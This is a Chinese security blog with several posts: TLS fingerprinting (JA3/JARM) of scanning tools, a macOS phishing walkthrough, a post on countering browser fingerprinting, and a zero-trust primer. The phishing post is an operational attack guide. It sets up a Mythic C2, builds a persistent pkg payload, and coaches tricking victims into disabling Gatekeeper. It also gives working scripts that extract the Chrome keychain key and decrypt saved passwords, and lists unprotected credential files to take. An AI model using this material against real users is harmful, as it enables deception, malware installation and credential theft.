375c6162a492dfbf2795909110ce8424

ip
771,4867-4866-4865-52393-52392-52394-49200-49196-49192-49188-49172-49162-159-107-57-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49169-49159-5-4-49170-49160-22-10-255,43-51-11-10-13-16,29-23-24-25,0
4f2655722e37c542ebeaf1eed48cbbbb

curl的作者在 https://daniel.haxx.se/blog/2022/09/02/curls-tls-fingerprint/ 文章中介绍了 https://github.com/lwthiker/curl-impersonate 这个项目，是一个修改过的curl，用来模拟真实浏览器相同的tls握手.

实际测试抓包看看

使用 curl_chrome100 访问几个站点试试

可见，ja3box给出了不同的ja3结果，但ja3_no_grease结果是相同的，接下来稍微了解这个grease是啥

GREASE机制

参考wireshark的这个issue https://gitlab.com/wireshark/wireshark/-/issues/17942 正确计算ja3值需要排除grease

GREASE是Generate Random Extensions And Sustain Extensibility的缩写，由Google的David Benjamin发明,在RFC8701中被正式定义。

也就是客户端在握手时可以发送一组服务器要忽略的伪版本号，来防止TLS协议在将来进行扩展的时候受到阻碍。

参考这个文章的描述 https://zhuanlan.zhihu.com/p/343562875

TLS在握手阶段首先需要客户端向服务器发送ClientHello记录，里面记录了自己支持的TLS版本、CipherSuites类型以及一些Extension等，如果服务器可以处理，会返回一个ServerHello记录，里面记录了选择的CipherSuite和一些Extension，为了保证协议的可扩展性，cipher和extension等字段的取值会有一些保留值，留待之后的版本使用，比如在TLSv1.2中就增加了AEAD类型的Cipher。

GREASE机制就是对这些参数分别限定了一些保留值，称为GREASE值，这些值在目前的TLS协议中是没有意义的，比如用于CipherSuites和Application-Layer Protocol Negotiation (ALPN)

协议规定在客户端发送ClientHello的时候可能会选择一个或多个GREASE放到对应字段发送给服务器。

而如果客户端在接收到服务器发送的记录（如ServerHello，Certificate，EncryptedExtensions等）中发现了GREASE值，客户端必须拒绝此记录并关闭连接

同时规定了服务器在发现ClientHello中的GREASE值的时候：

1. 不能使用这些GREASE值进行进一步协商，而必须把它们当作普通保留值
2. 必须忽略这些值，并使用此参数的其他值进行协商

这是一种很巧妙的设计，类似于囚徒困境，每个TLS软件库既有可能被用于客户端，也可能被用于服务端，而由于目前存在多款应用广泛的TLS软件库，无法保证客户端使用的TLS库一定与服务端使用的TLS库相同，为了保证自己的库能够与其他库正常交互，各个软件库在实现的时候就不得不遵循这一约定。

同样，对于一些由服务器端首先发出的参数，此文档用相似的方式规定了客户端和服务器的行为。

GREASE机制的具体实现可以参考 https://www.rfc-editor.org/rfc/rfc8701

在 https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967/ 一文中的描述为

We also needed to introduce some code to account for Google’s GREASE (Generate Random Extensions And Sustain Extensibility) as described here. Google uses this as a mechanism to prevent extensibility failures in the TLS ecosystem. JA3 ignores these values completely to ensure that programs utilizing GREASE can still be identified with a single JA3 hash.

大意就是在计算ja3时最好忽略grease值

burpsuite

再回到burp上，作为web安全人员最常用的工具之一，如果我想修改burp自身的ja3指纹该如何操作呢？

打开 Project options – TLS

这里我的burp版本默认选择的是 Use all supported protocols and ciphers of your Java installation

选择 Use custom protocols and ciphers,可以发现，允许我们自选协议和ciphers suites支持

随便修改下 Cipher,比如勾选图中4个选项 ,再次抓包看看ja3值

1
2

771,4866-4865-4867-49196-49195-52393-49200-52392-49199-159-52394-163-158-162-49188-49192-49187-49191-107-106-103-64-49198-49202-49197-49201-49190-49194-49189-49193-49162-49172-49161-49171-57-56-51-50-49157-49167-49156-49166-157-156-61-60-53-47-49160-49170-22-19-49155-49165-10-255-167-166-49177-109,0-5-10-11-16-17-23-35-13-43-45-50-51,29-23-24-25-30-256-257-258-259-260,0
b0aca4c8b85f2c1f6d067382f5e334e7

可以看到对应的多出了4个Extension,这样通过自定义 Cipher Suites 可以简单快速的修改 ja3 特征

https://github.com/sleeyax/burp-awesome-tls

这个扩展也可以修改burp的ja3指纹

nuclei+httpx

httpx和nuclei作为projectdiscovery重点的2个项目，也是国内外红队必备的工具

这里分别抓下httpx和nuclei的ja3指纹试试

httpx 1.2.4

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

nuclei 2.7.7

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

竟然是一样的，那换个版本试试？

httpx 1.2.3

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

httpx 1.2.2

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

httpx 1.1.5

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

httpx从1.2.4到1.1.5有10个月时间，这其中ja3一直没有变过，蓝队要是单独做了拦截，还是很有效果的。

同样的，测试了在mac上的结果，nuclei和httpx ja3指纹不变

subfinder作为子域名收集工具，主要是向各家api去请求，并没有直接对目标的访问，当然抓一下对api的访问，其实会发现其ja3指纹和httpx一样的。

xray

再来看看被动扫描器里面比较常见的xray,当然xray也有主动扫描功能，一并测测

xray 1.9.3 主动扫描 linux/mac一致

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

xray 1.9.3 被动扫描 linux/mac一致

域名
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,0-5-10-11-13-65281-18-43-51,29-23-24-25,0
473cd7cb9faa642487833865d516e578

ip
771,49195-49199-49196-49200-52393-52392-49161-49171-49162-49172-156-157-47-53-49170-10-4865-4866-4867,5-10-11-13-65281-18-43-51,29-23-24-25,0
19e29534fd49dd27d09234e639c4057e

crawlergo

crawlergo的ja3结果在排除GREASE值的情况下也是固定的

1
2

771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-21,29-23-24,0
b32309a26951912be7dba376398abc3b

什么是ja3s

JA3S 是用于 SSL/TLS 通信的服务器端的 JA3，用于识别服务器如何响应特定客户端。

ja3s 由 Server Hello 版本、可接受的加密算法和扩展列表中的每一个 type 值生成,也就是提取 Server Hello 数据包中的：Server Hello 版本、可接受的加密算法和扩展列表中的每一个 type 值 。然后用,来分隔各个字段、用使用-来分隔各个字段中的各个值，连接在一起后，计算 MD5.

例如我访问fofa

这里对server hello生成ja3s

上面所讲,识别恶意客户端行为可以用ja3，而识别很多c2的tls通信，可以则是采用ja3+ja3s，不用考虑IP、域名或证书等信息。也就是通过一来一回的交互来辅助研判。

什么是JARM

JARM是通过主动扫描生成的目标特征。

与ja3、ja3s不同，jarm用途主要用于服务端tls指纹测绘，例如识别c2服务器，自建域前置节点，指定jdk版本的服务等。

工作原理是向目标服务器发送10个特殊构造的TLS Client Hello包，以在TLS服务器中提取独特的响应，并捕获TLS Server Hello响应的特定属性，然后以特定的方式对聚合的TLS服务器响应进行hash，生成JARM指纹。

JARM发送10个TLS客户端Hello数据包，目的就是提取TLS服务器中的唯一响应。

查看具体代码实现 https://github.com/salesforce/jarm#L467

def main():
    #Select the packets and formats to send
    #Array format = [destination_host,destination_port,version,cipher_list,cipher_order,GREASE,RARE_APLN,1.3_SUPPORT,extension_orders]
    tls1_2_forward = [destination_host, destination_port, "TLS_1.2", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.2_SUPPORT", "REVERSE"]
    tls1_2_reverse = [destination_host, destination_port, "TLS_1.2", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.2_SUPPORT", "FORWARD"]
    tls1_2_top_half = [destination_host, destination_port, "TLS_1.2", "ALL", "TOP_HALF", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
    tls1_2_bottom_half = [destination_host, destination_port, "TLS_1.2", "ALL", "BOTTOM_HALF", "NO_GREASE", "RARE_APLN", "NO_SUPPORT", "FORWARD"]
    tls1_2_middle_out = [destination_host, destination_port, "TLS_1.2", "ALL", "MIDDLE_OUT", "GREASE", "RARE_APLN", "NO_SUPPORT", "REVERSE"]
    tls1_1_middle_out = [destination_host, destination_port, "TLS_1.1", "ALL", "FORWARD", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
    tls1_3_forward = [destination_host, destination_port, "TLS_1.3", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
    tls1_3_reverse = [destination_host, destination_port, "TLS_1.3", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
    tls1_3_invalid = [destination_host, destination_port, "TLS_1.3", "NO1.3", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
    tls1_3_middle_out = [destination_host, destination_port, "TLS_1.3", "ALL", "MIDDLE_OUT", "GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
    #Possible versions: SSLv3, TLS_1, TLS_1.1, TLS_1.2, TLS_1.3
    #Possible cipher lists: ALL, NO1.3
    #GREASE: either NO_GREASE or GREASE
    #APLN: either APLN or RARE_APLN
    #Supported Verisons extension: 1.2_SUPPPORT, NO_SUPPORT, or 1.3_SUPPORT
    #Possible Extension order: FORWARD, REVERSE
    queue = [tls1_2_forward, tls1_2_reverse, tls1_2_top_half, tls1_2_bottom_half, tls1_2_middle_out, tls1_1_middle_out, tls1_3_forward, tls1_3_reverse, tls1_3_invalid, tls1_3_middle_out]
    jarm = ""

在main函数，jarm定义了10种TLS Client Hello数据包生成的结构，分别包含了待扫描的目标、端口、tls客户端加密套件、TLS扩展列表

iterate = 0
    while iterate < len(queue):
        payload = packet_building(queue[iterate])
        server_hello, ip = send_packet(payload)
        #Deal with timeout error
        if server_hello == "TIMEOUT":
            jarm = "|||,|||,|||,|||,|||,|||,|||,|||,|||,|||"
            break
        ans = read_packet(server_hello, queue[iterate])
        jarm += ans
        iterate += 1
        if iterate == len(queue):
            break
        else:
            jarm += ","

依次遍历这10种TLS Client Hello结构生成数据包，并使用packet_building函数生成对应的TLS Client Hello数据包，通过send_packet发送数据包，使用read_packet解析返回TLS Server Hello，并拼接为如下格式：

`1`	`服务器返回的加密套件 \| 服务器返回选择使用的TLS协议版本 \| TLS扩展ALPN协议信息 \| TLS扩展列表`

通过发送10次TLS Client Hello并解析为以上格式，将10次解析的结果拼接以后最终调用jarm_hash算出最终的结果。

实际测试比如对CobaltStrike的识别，jarm主要和jdk版本相关，和CobaltStrike没有强关联性,JARM比较适合用于识别不同JDK环境下的TLS服务。

总结

整体来看，通过ja3指纹库识别一些常见自动化工具的扫描非常有效，但对于一些java gui的程序由于不同jdk版本、不同平台都会有影响，所以维护成本会很大。

当然ja3本质上是一种规则，一种思路，可以根据ja3的规则去生成md5，也可以根据你自己的判断挑选一些Version + Cipher Suites + Extension生成类似ja3的指纹去辅助研判，并且忽略排序顺序。但是切记要排除GREASE值。

彩蛋

为啥取名叫ja3？

因为是由Salesforce的工程师 John Althouse、Jeff Atkinson、Josh Atkins 三位创建的。

为啥用md5?

除了因为md5计算较快,具有不错的单一性，还因为md5不会太长，足以放到推文里

Source & Reference

Macos钓鱼实践

Mon, 27 Mar 2023 08:08:03 +0800

本文旨在科普macos平台的安全风险和钓鱼手段。

info

本文之前在公众号上发过,这里单纯备份一份

C2搭建

对于macos的远控工具市面上有许多,这里就简单介绍Mythic这款c2框架的搭建

git clone https://github.com/its-a-feature/Mythic

cd Mythic
./mythic-cli install github https://github.com/MythicAgents/poseidon
./mythic-cli install github https://github.com/MythicAgents/Apollo
./mythic-cli install github https://github.com/MythicC2Profiles/http
./mythic-cli start

./mythic-cli status
cat .env | grep 'MYTHIC_ADMIN'

当mythic_server容器第一次启动时，会经历一个初始化步骤，使用Mythic/.env中的密码和用户名创建mythic_admin_user用户。

启动完毕后访问 https://ip:7443

账号密码从配置文件里面查

登录后可以看到有安装Poseidon和apfell这2块payload,可以用于macos的payload生成

shell制作

macos的shell种类挺多,除了app、pkg还有dmg、office宏等形式,这里图个方便,就用Mystikal配合Mythic制作一个pkg格式的shel

Mystikal制作PKG文件

git clone https://github.com/D00MFist/Mystikal.git
cd Mystikal
sudo pip3 install -r requirements.txt

修改 Settings/MythicSettings.py 的配置

输入完,会产生如下目录结构

├── simple-package
│   └── scripts
│       ├── files
│       │   ├── SimpleStarter.js
│       │   └── com.simple.plist
│       ├── postinstall
│       └── preinstall
└── simple_LD.pkg

其中的simple_LD.pkg就是我们发给目标的shell了

Gatekeeper机制

当我们实际发送给目标打开时,就会发现遇到问题了

这是因为Gatekeeper机制造成的

如果可执行文件没有经过认证，Gatekeeper会提示用户该文件不能运行，因为它是未签名的。要运行未签名的可执行文件，用户必须右键单击文件，然后单击打开，而不是双击。

还有部分情况下需要在设置里进行信任才可以打开,右键打开的方式就不起作用了

另外有一点，从通讯工具等应用下载的可执行文件都会提示这个框

这也是Gatekeeper造成的，当从 Internet 下载可执行文件时，它们会标有属性com.apple.quarantine，该属性会在文件首次运行时触发gatekeeper。

可以看到我们的”apk渗透测试.zip”文件来自wechat应用。

但是com.apple.quarantine属性的添加是看应用的，比如从微信、浏览器等应用下载的文件会带这个属性，而从curl应用下载的文件是不带这个属性的.

可以通过xattr命令删除com.apple.quarantine属性

1
2

xattr -d com.apple.quarantine feishu_shell2.dmg
xattr -l feishu_shell2.dmg

在macos Catalina及之前的版本可以通过defaults write com.apple.LaunchServices "LSQuarantine" -bool "false"命令禁用quarantine信息提示,在Big Sur版本之后该方法不可用

在https://www.jamf.com/blog/cryptojacking-macos-malware-discovered-by-jamf-threat-labs/分享的案例中,攻击者通过诱导受害者关闭Gatekeeper检查以绕过不安全提示

`1`	`If you have issues with image (annoying image/application is damaged messages pretending you cannot open things) run in Terminal: sudo spctl --master-disable`

sudo spctl --master-disable
# 此命令用于完全禁用 Gatekeeper 功能

sudo spctl --master-enable
# 启用 Gatekeeper 功能

当我们用花言巧语诱导目标运行这个禁用命令后,目标在点击安装包基本就上线了(当然右键-左键运行也是可以的)

上线后会落地1个plist 1个shell,后续结束远控可以直接删除,这个是调用osascript加载js

1
2

/Library/LaunchDaemons/com.simple.agent.plist
/Library/Application Support/SimpleStarter.js

权限维持

在上线后我们就需要做权限维持了,不然shell掉了或者用户电脑重启了就前功尽弃，这里用pkg格式的方式其实就已经帮我们做好了权限维持

这里简单介绍下LaunchDaemons的概念

LaunchDaemon

在 Linux 上有一个大家惯用的 systemd，在 MacOS 上有一个与之相对应的工具，launchd。

macos通过后缀名为 .plist 的配置文件追加 launchd 的管理项。添加和删除，都是用 .plist 文件来完成的。

.plist 文件存在于下面的文件夹中，分别是

类型		说明
User Agents	~/Library/LaunchAgents	为当前登录用户启动
Global Agents	/Library/LaunchAgents	为当前登录用户启动
Global Daemons	/Library/LaunchDaemons	root 或者通过 UserName 配置指定的用户
System Agents	/System/Library/LaunchAgents	当前登录用户
System Daemons	/System/Library/LaunchDaemons	root 或者通过 UserName 配置指定的用户

而Mystikal生成的shell上线后会落地一个plist到用户的/Library/LaunchDaemons/com.simple.agent.plist位置

可以回头看一下Mystikal生成的payload里的preinstall

#!/bin/bash
cp files/com.simple.plist "/Library/LaunchDaemons/com.simple.agent.plist"
cp files/SimpleStarter.js "/Library/Application Support/SimpleStarter.js"
exit 0

可以看到其实就是将用于权限维持和拉起shell的com.simple.plist移到LaunchDaemons中用于持久化

在看下com.simple.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.simple.agent</string>
    <key>ProgramArguments</key>
    <array>
    <string>osascript</string>
    <string>/Library/Application Support/SimpleStarter.js</string>
    </array>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>

简单明了,就是调用osascript运行本地的js

这里在科普下LaunchAgents和LaunchDaemons2种方式的区别,就是LaunchAgents是普通用户，LaunchDaemons是root用户

后渗透

上线后就需要进行后渗透了，包括信息收集、凭证抓取、横向操作等等

浏览器信息抓取

这里参考HackBrowserData项目和网上类似功能的脚本手动来抓取目标主机chrome浏览器的信息

https://github.com/moonD4rk/HackBrowserData

首先mac下获取chrome储存的浏览器密码，需要Login Data和 Login Data 的加密密钥，加密密钥存在钥匙串中。

下载 ~/Library/Application Support/Google/Chrome/Default/Cookies 并在离线状态下解密文件。

# 查看下这个文件
file ~/Library/Application\ Support/Google/Chrome/Default/Cookies

下载到本地

获取加密密钥

`1`	`security 2>&1 > /dev/null find-generic-password -ga 'Chrome' \| awk '{print $2}'`

在用户侧会弹框输入密码后可以看到加密密钥,这里测试直接下发命令不能触发弹框,可以通过脚本去触发

触发弹框提取的脚本

import sqlite3, os, binascii, subprocess, base64, sys, hashlib, glob

loginData = glob.glob("%s/Library/Application Support/Google/Chrome/Profile*/Login Data" % os.path.expanduser("~"))
if len(loginData) == 0:
    loginData = glob.glob("%s/Library/Application Support/Google/Chrome/Default/Login Data" % os.path.expanduser("~")) #attempt default profile

print(loginData[0])
safeStorageKey = subprocess.check_output("security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'", shell=True).decode().replace("\n", "").replace("\"", "")
# .replace("\n", "").replace("\"", "")
print(safeStorageKey)

if safeStorageKey == "":
    print("ERROR getting Chrome Safe Storage Key")
    sys.exit()

获取chrome浏览器密码文件路径，和加密密钥

本地解密的脚本

import sqlite3, os, binascii, subprocess, base64, sys, hashlib, glob

def chromeDecrypt(encrypted_value, iv, key=None): #AES decryption using the PBKDF2 key and 16x ' ' IV, via openSSL (installed on OSX natively)
    hexKey = binascii.hexlify(key)
    hexEncPassword = base64.b64encode(encrypted_value[3:])
    try: #send any error messages to /dev/null to prevent screen bloating up
        decrypted = subprocess.check_output("openssl enc -base64 -d -aes-128-cbc -iv '%s' -K %s <<< %s 2>/dev/null" % (iv, hexKey, hexEncPassword), shell=True)
    except Exception as e:
        decrypted = "ERROR retrieving password"
    return decrypted

def chromeProcess(safeStorageKey, loginData):
    iv = ''.join(('20',) * 16) #salt, iterations, iv, size - https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm
    key = hashlib.pbkdf2_hmac('sha1', safeStorageKey, b'saltysalt', 1003)[:16]
    fd = os.open(loginData, os.O_RDONLY) #open as read only
    database = sqlite3.connect('/dev/fd/%d' % fd)
    os.close(fd)
    sql = 'select username_value, password_value, origin_url from logins'
    decryptedList = []
    with database:
        for user, encryptedPass, url in database.execute(sql):
            if user == "" or (encryptedPass[:3] != b'v10'): #user will be empty if they have selected "never" store password
                continue
            else:
                urlUserPassDecrypted = (url.encode('ascii', 'ignore'), user.encode('ascii', 'ignore'), chromeDecrypt(encryptedPass, iv, key=key).encode('ascii', 'ignore'))
                decryptedList.append(urlUserPassDecrypted)
    return decryptedList

#print(chromeProcess(safeStorageKey,loginData[0]))
print(chromeProcess("Yysssssssssssssssss=","/tmp/aaadatabase"))
#print(chromeProcess("key","/Users/user/Library/Application Support/Google/Chrome/Default/Login Data"))

这里我把Login Data复制到本地/tmp/aaadatabase,避免出现****sqlite3.OperationalError: database is locked****报错

Keychain

在抓取的过程中我们可以看到，会弹框要求输入密码，这里科普一下macos的 Keychain概念

Keychain类似与Windows上的LSASS，并保存了应用程序的密码和密钥等秘密。例如，应用程序可能会加密其存储在磁盘上的文件，并将这些文件的解密密钥存储在钥匙串中。

系统钥匙串位于/Library/Keychains/System.keychain，用户的钥匙串位于~/Library/Keychains/login.keychain-db。

我们可以下载用户的钥匙串，但其中的密码将使用用户的密码进行加密,所以我们下载的目标的chrome信息也是通过用户密码进行加密的，所以我们需要用security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'来获取加密密钥

微信信息

这里参考巴斯.zznQ师傅文章里的方法，通过(frida-go)从内存中读取进行解密

https://blog.macoder.tech/macOS-6faf0534323c42259f5277bd95d35c43

安装frida-go

下载frida对应的frida-core-devkit

sudo cp libfrida-core.a /usr/local/lib/libfrida-core.a
sudo mkdir -p /usr/local/include
sudo cp frida-core.h /usr/local/include/frida-core.h

打包成单个 main.go 文件

`1`	`go build -ldflags '-w -s'`

System Integrity Protection (SIP)

但是，在实际测试时又遇到了一个问题

这是因为由于SIP限制,微信开启了Hardened Runtime导致frida无法访问到微信

那么SIP又是什么?

系统完整性保护（SIP）又称“rootless”，通过 Rootless，即使第三方程序获取了系统 Root 权限，也做不了以下事情。

文件系统保护 系统中重要的目录与文件，不能被第三方应用程序任意修改。例如 /System /bin /sbin /usr 等目录中的文件，第三方程序即使获取了 Root 权限也不可修改。系统中所有被保护的系统目录及程序列表可查看文件/System/Library/Sandbox/rootless.conf
运行时保护 向一个系统进程中注入代码与修改磁盘上受保护的文件一样，都是会失败的。受系统保护的程序与使用苹果私有的 entitlements 签名的程序，在运行时都被内核标记为 restricted，在最新的系统中，开发者再也不能直接使用 task_for_pid() / processor_set_task() 来对受保护的进程进行操作了，会直接返回 EPERM 错误。

通过 restricted 标志可以识别受 SIP 保护的文件。
1

ls -laO [PATH]
内核扩展限制 第三方开发的 kext 内核扩展必须经过签名之后放到 /Library/Extensions 目录下。

可以恢复模式下通过 csrutil disable 禁用 SIP，在常规钓鱼场景中很难引诱用户这么做，不过一般使用mac的开发人员会主动关闭sip。

用户目录/屏幕信息

当我们要在目标电脑上截屏或者访问用户目录下的一些文件时,又会发现有弹框了

而这是mac的tcc机制造成的，tcc又是啥🤔️

TCC是macOS上的隐私功能，自v10.14+开始实施，当应用程序尝试访问某些资源（如相机和某些文件夹，包括Desktop, Downloads, Documents和驱动器/卷）时，会提示用户明确授予权限。

尝试访问受TCC保护的资源而没有权限可能会有弹框提示，导致用户察觉到shell的存在。以下是一些未受TCC保护的有用文件：

主目录中的隐藏文件和文件夹：~/.aws/*、~/.ssh/*、~/.bash_history、~/.zsh_history。
用户应用程序数据 — 〜/Library/Application Support/*
Cookie 文件 — ~/Library/Application Support/Google/Chrome/Default/Cookies , ~/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/Cookies

浏览“设置”-“隐私与安全”，可以查看 TCC 权限。系统 TCC 数据库位于 /Library/Application Support/com.apple.TCC/TCC.db，每个用户都有一个位于 ~/Library/Application Support/com.apple.TCC/TCC.db 的 TCC 数据库。

我们需要截屏录屏就是需要tcc中屏幕录制权限了。

总结

在macOS系统中，钓鱼攻击是一种常见的网络攻击方式，企业用户需要了解黑客的攻击方式，并采取相应的防御措施来保护自己的安全。本篇科普文章详细介绍了黑客如何进行macOS钓鱼攻击，包括常见的攻击方式和识别方法，希望能帮助企业用户更好地了解钓鱼攻击的特点和危害，掌握防御技巧，从而有效地预防钓鱼攻击对企业安全的威胁。

浏览器特征追踪对抗

Thu, 19 Jan 2023 12:00:00 +0800

前一段时间看到了 Heimdallr 项目,感觉非常有用,学习下几个功能的实现

WebRTC

WebRTC，名称源自网页即时通信（英语：Web Real-Time Communication）的缩写，是一个支持网页浏览器进行实时语音对话或视频对话的 API。

WebRTC采用STUN（Session Traversal Utilities for NAT）、TURN和ICE等协议栈对VoIP网络中的防火墙或者NAT进行穿透。用户发送请求至服务器，STUN服务器会返回用户所用系统的IP地址和局域网地址。返回的请求可以通过JavaScript获取，但由于这个过程是在正常的XML/HTTP请求过程之外进行的，所以在开发者控制台看不到。

可以在这个站点测试 https://ip.voidsec.com/

在页面源码中可以看到是向google的stun服务器发送请求

<script type="58f67369e5bd5410552801c0-text/javascript">
			function findIP(onNewIP) {
				var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
				var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}),
				noop = function() {},
				localIPs = {},
				ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
				key;

				function ipIterate(ip) {
					if (!localIPs[ip]) onNewIP(ip);
					localIPs[ip] = true;
				}

				pc.createDataChannel("");

				pc.createOffer(function(sdp) {
					sdp.sdp.split('\n').forEach(function(line) {
						if (line.indexOf('candidate') < 0) return;
						line.match(ipRegex).forEach(ipIterate);
					});
					pc.setLocalDescription(sdp, noop, noop);
				}, noop);

				pc.onicecandidate = function(ice) {
					if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
					ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
				};
			}

			function addIP(ip) {
				//console.log('got ip: ', ip);
				var li = document.createElement('li');
				li.textContent = ip;
				document.getElementById("IPLeak").appendChild(li);
			}
			findIP(addIP);
		</script>

wireshark 抓包查看,可以看到返回包中有访问者的ip

来看看Heimdallr插件如何做处理的

将 chrome.privacy.network.webRTCIPHandlingPolicy 配置为 disable_non_proxied_udp 修改浏览器WebRTC IP 处理策略

再次访问

在火狐中类似的配置，在地址栏输入 about:config，搜索 media.peerconnection.enabled 并双击将值改为 “false”，关闭 WebRTC 。

Canvas指纹

浏览器指纹一般是通过 Javascript 能提取或计算得到的一些具有一定稳定性和独特性的参数，而Canvas指纹也是其中的一个特征。

Canvas指纹的原理，每一种浏览器都会使用不同的图像处理引擎，不同的导出选项，不同的压缩等级，所以每一台电脑绘制出的图形都会有些许不同，这些图案可以被用来给用户设备分配特定编号（指纹），也就是说可以用来识别不同用户。

可以在这个站点测试 https://fingerprintjs.github.io/fingerprintjs/

来看看Heimdallr插件如何做处理的,通过对当前网页注入内容脚本增加Canvas画布噪点防止特征锁定

if (HConfig.canvasInject == true){
      chrome.scripting.getRegisteredContentScripts(function(injectContentScript){
        if (injectContentScript != null && injectContentScript.length == 0){
          chrome.scripting.registerContentScripts([{"allFrames":true, "id":"HInject", "js":["resource/inject/inject.js"], "runAt":"document_start", "matches":["http://*/*","https://*/*","file://*/*"]}], function(){
              console.log("注册Content Script: Canvas interference")
            })
        }
      })

再来看看inject.js的内容

访问时加载content.js

测试指纹结果

DNS泄漏

在某些情况下，即使连接到匿名网络，操作系统仍将继续使用其默认 DNS 服务器，而不是匿名网络分配给您的计算机的匿名 DNS 服务器。

因此向dns服务器发出的请求并不通过代理或vpn(指没有进行指定配置的情况)。

注意dns泄漏获取不到真实ip，只能用于辅助判断出口地区

可以通过这个站点进行测试 https://dnsleaktest.com/

抓包可以看到向多个子域站点发送了请求

如何防止dns泄漏的问题

就以burp为例，可以设置通过socks代理服务器进行dns解析

再次进行测试

从浏览器插件的角度，对dnsleak这种探测来源地区的方式没有有效的防御方法。

Source & Reference

浅谈零信任

Sat, 07 Jan 2023 12:00:00 +0800

本文旨在梳理零信任架构中的安全理念、应用场景等。

info

本文之前在公众号上发过,这里补充完善一下

什么是零信任

随着产业数字化不断升级，企业资源逐渐向云端与移动端迁移，旧有边界防御的安全体系难以为继，在端、网、云协同办公环境的的安全需求下，“零信任”安全的概念日渐火热。

零信任（Zero Trust）既不是一门新技术也不是新产品，而是一种安全理念。

传统网络安全架构默认网络安全即是边界安全。通过在网络边界验证用户身份，如果用户验证通过即为“可信”，即可进入网络内部。此时已经接入的设备具备大量资源的网络访问能力，往往成为入侵的第一道跳板，如邮件IM钓鱼、社工间谍、利用IOT入侵、高级APT木马、员工失误等。

2010 年，著名研究机构 Forrester 的首席分析师 John 正式提出了零信任这个术语，明确了零信任架构的理念，该模型改进了耶利哥论坛上讨论的去边界化的概念，并提出三个核心的观点：

不再以一个清晰的边界来划分信任或不信任的设备
不再有信任或不信任的网络
不再有信任或不信任的用户

零信任摒弃边界概念，默认所有人、设备和访问请求均不可信任，将访问控制细粒到具体的人和设备，对其进行身份验证和细粒度的权限管控。可以说零信任实际上是一项网络安全战略计划，通过摒弃组织网络架构中的信任概念来阻止企业内部的数据泄露。

